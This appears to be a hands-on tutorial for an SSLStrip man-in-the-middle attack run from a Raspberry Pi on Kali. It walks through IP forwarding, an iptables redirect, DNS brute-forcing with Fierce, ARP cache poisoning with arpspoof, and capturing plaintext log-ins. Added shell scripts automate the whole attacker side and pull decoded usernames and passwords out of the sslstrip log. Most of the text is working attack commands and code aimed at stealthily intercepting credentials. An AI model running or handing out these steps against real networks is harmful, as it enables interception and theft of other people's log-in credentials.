A successful attack on SSL encryption requires tools other than Wireshark. One such tool is SSLStrip. Rather than breaking the encryption, SSLStrip sits between the victim and the server as a man-in-the-middle (MitM): it keeps an HTTPS connection to the server while serving the victim a plain HTTP copy of each page, rewriting every https:// link and redirect to http://. The browser never sees an HTTPS session at all, so it shows no certificate warning, and the user is unlikely to notice the missing padlock. The attack depends on the first request going out over plain HTTP; a browser that already has an HSTS policy for the site (from an earlier visit or from the browser's preload list) goes straight to HTTPS and gives SSLStrip nothing to rewrite.
The above image shows a normal secure connection to a web server. Data passes directly between the user and the server over an encrypted channel, and the user is relatively safe.
In the attack scenario the attacker is inserted as a MitM: the victim's secure requests are replaced with unsecured ones, and everything the victim then submits, log-in credentials included, crosses the local network in plain text.
The best way to learn a new program is to read its help output. For SSLStrip:
root@kali:~# sslstrip -h
SSLStrip Attack Process
The following sections cover each part of the attack, in the order you carry them out. Use the navigation below to skip to a specific section, jump to the video tutorial, or review the commands-only section.
- Setup IP forwarding
- Configure iptables to redirect traffic destined for port 80 to port 8080
- Discover the network gateway IP
- Locate the target IP address
- Insert the Raspberry Pi as a MitM with ARPSpoof
- Recover Log-In Credentials Using SSLStrip
IP forwarding tells the Linux kernel to pass on packets that are not addressed to it. It must be enabled before we attempt ARP cache poisoning: once we have inserted ourselves as a MitM, every packet from the target arrives at the Raspberry Pi, and if the Pi does not forward it to its real destination the target simply loses connectivity. Without forwarding we have created a denial of service (DoS) rather than an interception.
Step 1: Setup IP forwarding
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Confirm that the setting took effect (the file should now contain 1):
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
Step 2: Redirect forwarded packets destined for TCP port 80 to local port 8080. That is the port SSLStrip will listen on, so the target's HTTP traffic is handed to SSLStrip before it leaves the Pi. HTTPS (port 443) is deliberately not redirected; SSLStrip itself opens the HTTPS connections to the server on the victim's behalf.
root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Find Default Gateway
Step 3: Discover your current default gateway (on systems without netstat, ip route show gives the same information)
root@kali:~# netstat -nr
Locate Target IP
There are several ways to discover the IP address of your target system: network enumeration, DNS enumeration, Active Directory fingerprinting, and social engineering, to name a few. Since the Raspberry Pi is already on the host network, we can run several commands that provide useful information. One option is a full scan of the entire network. Although informative, a scan of that size may give away the Raspberry Pi, and we want to maintain stealthy access.
Another option is to check whether the target network's DNS servers allow zone transfers. Over the years, however, several protections have been added against such DNS attacks, and most servers now refuse transfers. That said, by design a DNS server will always answer a query if it knows the answer. This is an inherent weakness; the trick is to know what to ask. Brute-forcing likely host names gets around the restriction.
Fierce is a program that queries a target DNS server for a list of fully qualified domain names within a specified domain. The goal is to find out which names are valid and return the IP address of each. Fierce has a built-in list of 2,280 common host names that are tried by default. The following domain names have been added to my ISP's DNS; let's find out how many are caught by Fierce's default list.
Step 4: Locate target IP address
root@kali:~# fierce -dns bahansen.info
Fierce found three of the six above entries, plus several default entries created by my host provider for essential services.
In my opinion the most enticing entry listed above is accounting.bahansen.info, which resolves to 192.168.2.87. Thus we are going to move forward with our attack on the Accounting workstation. With both the target system and the default gateway known, we can execute the attack.
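The brute-force idea behind Fierce, reduced to a loop that tries a list of common host names under a domain. This is an added example, not code from the original page or from the Fierce project. The resolver is passed in as a function name so the loop can be exercised offline with the constructed fake_resolve below (its answers for www and mail use RFC 5737 documentation addresses and are made up; only the accounting entry comes from the page); dig_resolve does real lookups and needs dig and network access.

```shell
#!/bin/sh
# Added example (not from the original page or from Fierce): the brute-force idea
# behind Fierce as a plain loop over a list of common host names under a domain.
# The resolver is injected as a function name so the loop runs offline with the
# constructed fake_resolve below; dig_resolve does the real lookups.

# A handful of common host names. Fierce's built-in list is far longer; this subset
# is constructed for the example.
default_names() {
  printf '%s\n' www mail ftp vpn intranet accounting
}

# Real resolver: prints the first A record for $1, optionally querying nameserver $2.
# Needs network access and dig (dnsutils / bind9-dnsutils on Kali).
dig_resolve() {
  dig +short +time=2 +tries=1 ${2:+@"$2"} "$1" A | grep -E '^[0-9.]+$' | head -n 1
}

# Constructed offline resolver: the page's accounting host plus two made-up
# documentation-range (RFC 5737) addresses for www and mail; anything else is NXDOMAIN.
fake_resolve() {
  case "$1" in
    www.bahansen.info)        echo 203.0.113.10 ;;
    mail.bahansen.info)       echo 203.0.113.20 ;;
    accounting.bahansen.info) echo 192.168.2.87 ;;
  esac
}

# brute_dns DOMAIN RESOLVER [NAMESERVER]: prints "fqdn ip" for every name that resolves.
brute_dns() {
  domain=$1; resolver=$2; ns=${3:-}
  default_names | while read -r name; do
    fqdn="$name.$domain"
    ip=$("$resolver" "$fqdn" "$ns")
    if [ -n "$ip" ]; then
      printf '%s %s\n' "$fqdn" "$ip"
    fi
  done
}

# Offline demo on the constructed resolver.
# For a live run against the real DNS: brute_dns bahansen.info dig_resolve
brute_dns bahansen.info fake_resolve
```

Swapping the word list for Fierce's own (or a larger one) is the only change needed to scale this up; the loop sends one query per name, which is far less noisy on the wire than a network scan.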
MitM with ARPSpoof
With -t and -r, ARPSpoof continuously sends forged ARP replies in both directions: it tells the Accounting system that the Raspberry Pi's MAC address belongs to the gateway, and tells the gateway that the Pi's MAC address belongs to the Accounting system. Both then send their packets to the Pi. The IP forwarding enabled in Step 1 passes those packets on to their real destination, and the port 80 rule from Step 2 diverts the HTTP traffic through SSLStrip on the way.
The syntax for ARPSpoof follows:
arpspoof -i <interface> -t <target IP> -r <gateway IP>
Step 5: Issue the ARP cache poisoning command using ARPSpoof
root@kali:~# arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1
This command occupies the current terminal. Leave ARPSpoof running and open a second connection to the Raspberry Pi for the remaining commands.
SSLStrip is a simple command-line program that attempts to replace secure encrypted web pages with their plain-text equivalents.
Step 6: Open a new ssh session
root@kali:~# ssh 192.168.11.15
Step 7: Start SSLStrip listening on port 8080, the port the iptables rule from Step 2 redirects to. Captured requests are written to sslstrip.log in the current directory.
root@kali:~# sslstrip -l 8080
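The whole attacker side of Steps 1, 2, 5 and 7 as one script that cleans up after itself. This is an added example, not code from the original page or from the SSLStrip or dsniff projects. It assumes a root shell on Kali with dsniff (arpspoof) and sslstrip installed, and takes the interface, target and gateway as arguments; the log file name and the is_ipv4 and redirect_rule helpers are this example's own. The -w flag is sslstrip's option for naming the log file.

```shell
#!/bin/sh
# Added example (not from the original page): Steps 1, 2, 5 and 7 in one script that
# undoes its changes when SSLStrip exits or the script is interrupted.
# Assumes a root shell on Kali with dsniff (arpspoof) and sslstrip installed.
# Usage: sh sslstrip-mitm.sh eth0 192.168.2.87 192.168.2.1

PORT=8080              # port SSLStrip listens on; must match the iptables rule
LOG=sslstrip.log       # sslstrip's default log name, passed explicitly with -w
arp_pid=''
orig_forward=''

# Returns 0 for a syntactically valid dotted-quad IPv4 address, 1 otherwise.
is_ipv4() {
  case "$1" in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  set -- $(printf '%s' "$1" | tr '.' ' ')
  [ "$#" -eq 4 ] || return 1
  for octet; do
    [ "$octet" -le 255 ] || return 1
  done
}

# The nat rule from Step 2, built in one place so the -A (add) and -D (delete)
# calls cannot drift apart.
redirect_rule() {
  printf 'PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' "$1"
}

cleanup() {
  # Without this the LAN stays poisoned after we leave: the target's traffic keeps
  # arriving at the Pi, and once forwarding is off again it is simply dropped (DoS).
  # arpspoof re-advertises the real MAC addresses when it is terminated cleanly,
  # so use TERM (the default), never KILL.
  [ -n "$arp_pid" ] && kill "$arp_pid" 2>/dev/null
  iptables -t nat -D $(redirect_rule "$PORT") 2>/dev/null
  [ -n "$orig_forward" ] && echo "$orig_forward" > /proc/sys/net/ipv4/ip_forward
}

run_attack() {
  iface=$1; target=$2; gateway=$3
  [ "$(id -u)" -eq 0 ] || { echo 'must run as root' >&2; return 1; }
  is_ipv4 "$target" && is_ipv4 "$gateway" || { echo 'bad IP address' >&2; return 1; }

  orig_forward=$(cat /proc/sys/net/ipv4/ip_forward)
  trap cleanup EXIT INT TERM
  echo 1 > /proc/sys/net/ipv4/ip_forward                  # Step 1
  iptables -t nat -A $(redirect_rule "$PORT")             # Step 2
  arpspoof -i "$iface" -t "$target" -r "$gateway" &       # Step 5, in the background
  arp_pid=$!
  sleep 2                                                  # let the first forged replies land
  sslstrip -l "$PORT" -w "$LOG"                           # Step 7; Ctrl-C here runs cleanup
}

# Only launch the attack when interface, target and gateway were all supplied.
if [ "$#" -eq 3 ]; then
  run_attack "$@"
else
  echo "usage: $0 <interface> <target IP> <gateway IP>" >&2
fi
```

Running sslstrip in the foreground means a single Ctrl-C ends the capture and, through the EXIT trap, stops arpspoof, removes the nat rule and restores the original ip_forward value, so the Accounting system is not left without a working gateway once the second ssh session is closed.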
On the target computer open a browser, go to www.facebook.com and log in with your account. Note that a current browser will not downgrade facebook.com: the site enforces HSTS and is on the browsers' preload list, so the browser goes straight to HTTPS and SSLStrip never sees a request it can rewrite. For a reliable demonstration use a test site that does not set HSTS.
Step 8: Stop SSLStrip
Ctrl + C
Step 9: Review the captured data
root@kali:~# more sslstrip.log
The "%40" is URL encoding for "@", and "%21" is URL encoding for "!"; after decoding you get:
User Name: email@example.com
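Decoding the log by hand works for one entry; for a longer capture the decoding and field extraction are better scripted. The following is an added example, not code from the original page or from the SSLStrip project. The sample log inside it is constructed (it approximates sslstrip's "SECURE POST Data (host):" entry format and contains no real credentials), and the set of field names treated as credentials is an assumption of the example.

```shell
#!/bin/sh
# Added example (not from the original page): decode the URL-encoded POST bodies that
# sslstrip writes to its log, so "%40" becomes "@" and "%21" becomes "!".
# The sample log below is constructed; it approximates sslstrip's
# "SECURE POST Data (host):" entries and contains no real credentials.

# Percent-decode one string (also turns '+' into a space) in portable sh.
# A decoded value ending in a newline loses it to command substitution; credentials
# never legitimately end that way, so this is accepted here.
urldecode() {
  s=$1
  out=''
  while [ -n "$s" ]; do
    c=${s%"${s#?}"}          # first character
    s=${s#?}                 # remainder
    case "$c" in
      '+') out="$out " ;;
      '%')
        case "$s" in
          [0-9A-Fa-f][0-9A-Fa-f]*)
            hex=${s%"${s#??}"}
            s=${s#??}
            oct=$(printf '%03o' "$((0x$hex))")   # hex byte -> octal escape
            out="$out$(printf "\\$oct")"
            ;;
          *) out="$out%" ;;                      # malformed escape: keep the '%'
        esac
        ;;
      *) out="$out$c" ;;
    esac
  done
  printf '%s' "$out"
}

# Read an sslstrip log on stdin and print credential-looking fields, decoded.
# Field names are matched case-insensitively by prefix: email, pass(word), user(name), login.
extract_creds() {
  grep -o '[A-Za-z_]*=[^&]*' | grep -Ei '^(email|pass|user|login)' |
  while IFS='=' read -r key val; do
    printf '%s=%s\n' "$key" "$(urldecode "$val")"
  done
}

# Constructed sample log; the timestamps, session token and accounts are made up.
sample_log() {
  cat <<'EOF'
2013-03-10 21:15:02,114 SECURE POST Data (www.facebook.com):
lsd=AVoXyz12&email=email%40example.com&pass=Super%21Secret&default_persistent=0
2013-03-10 21:16:40,902 SECURE POST Data (mail.bahansen.info):
user=jdoe&password=p%40ss%2Bword+1
EOF
}

# Demo on the constructed sample. On a real capture: extract_creds < sslstrip.log
sample_log | extract_creds
```

The decoder deliberately leaves a stray "%" that is not followed by two hex digits untouched rather than failing, since captured form data is not guaranteed to be well formed.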
Commands Only
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
netstat -nr
fierce -dns bahansen.info
arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1
sslstrip -l 8080
more sslstrip.log